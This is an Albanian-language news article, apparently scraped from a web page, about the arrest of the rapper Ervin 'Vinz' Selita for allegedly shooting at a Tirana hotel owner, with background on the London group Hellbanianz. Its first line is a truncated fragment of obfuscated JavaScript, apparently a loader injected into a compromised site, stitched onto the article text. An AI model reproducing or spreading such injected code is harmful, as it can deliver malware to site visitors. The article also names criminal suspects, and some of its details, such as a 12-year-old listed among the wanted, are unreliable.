;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tentoi të vrasë pronarin e një hoteli, arrestohet reperi shqiptar

By

Një 30 vjeçar i identifikuar si Ervin Selita është arrestuar nga policia e Tiranës pasi tentoi të vriste me armë zjarri Zeni Xhindin, pronar i një hoteli në Tiranë.

Një grua që po e shoqëronte Selitën gjithashtu është arrestuar dhe po hetohet. Burimet zugjerojnë se Selita fillimisht pati një konfrontim me recepsionistin e hotelit pasi ky i fundit nuk e lejoi gruan të hynte pa treguar kartelën e indentitetit. Më pas, pronarët u përfshinë në një konflikt që coi deri tek përdorimi i armëve të zjarrit.

Policia sugjeron që Ejon Mici, 12, dhe Xhuljano Selita, 23, janë deklaruar në kërkim në lidhje me këtë ngjarje, të cilët ndihmuan 30 vjecarin të fshihte armën me të cilën tentoi ta vriste Xhindin.

Arma nuk është gjetur ende dhe raportohet që të jetë marrë nga të shpallurit në kërkim të cilët janë larguar nga vendi i ngjarjes para mbërritjes së bluve. Ndërkohë janë sekuestruar kamerat e sigurisë së hotelit ku ka ndodhur ngjarja, por paraprakisht bëhet me dije se 30-vjeçari ka qëlluar me armë zjarri dhe ka dëmtuar fasadën e jashtme të hotelit.

Kush është Ervin Selita që ndryshe njihet me nofkën Vinz?

Ervin Selita, 30-vjeçari i njohur si ‘VINZ’ është vënë në pranga ditën e sotme nga policia e Tiranës, pasi akuzohet se ka tentuar të vrasë me armë zjarri një pronar hoteli. I riu është një person i njohur në Shqipëri dhe në Londër. Ai është pjesëtar i grupit të njohur ‘Hellbanianz‘, grup që ka qënë në fokus të mediave londineze si të rrezikshëm, sipas Dosja.al.

Hellbanianz është një grup i dominuar nga shqiptarët dhe sipas raportit të policisë, merret me trafikun e drogës në lindje të kryeqytetit britanik. Ky grup ka hyrë fuqishëm edhe në tregun shqiptar, por jo me kokainë, por me videoklipe, të cilat kanë rezultuar të suksesshme. Këngët e tyre në ‘Youtube’ kanë miliona shikime, ndërsa në videoklipe reklamohet jeta e shtrenjtë që ata bëjnë, me makina dhe aksesorë luksi. Anëtarët e Hellbanianz nuk e fshehin në tekstet e këngëve aktivitetin me të cilin merren në Londër.

‘Hellbanianz’ është një prej grupeve shqiptare që veprojnë në lindje të Londrës, raportoi ‘The Times’, dhe që veçohet nga grupet e tjera shqiptare’. Mediat britanike e konsiderojnë “Hellbanianz” si një nga disa bandat e fuqishme që merren me kartelet e drogës në Amerikën e Jugut. Ata thuhet se qëndrojnë pas linjave të trafikut të kokainës së pastër në Britaninë e Madhe. /Prive.al

Artikuj të ngjashëm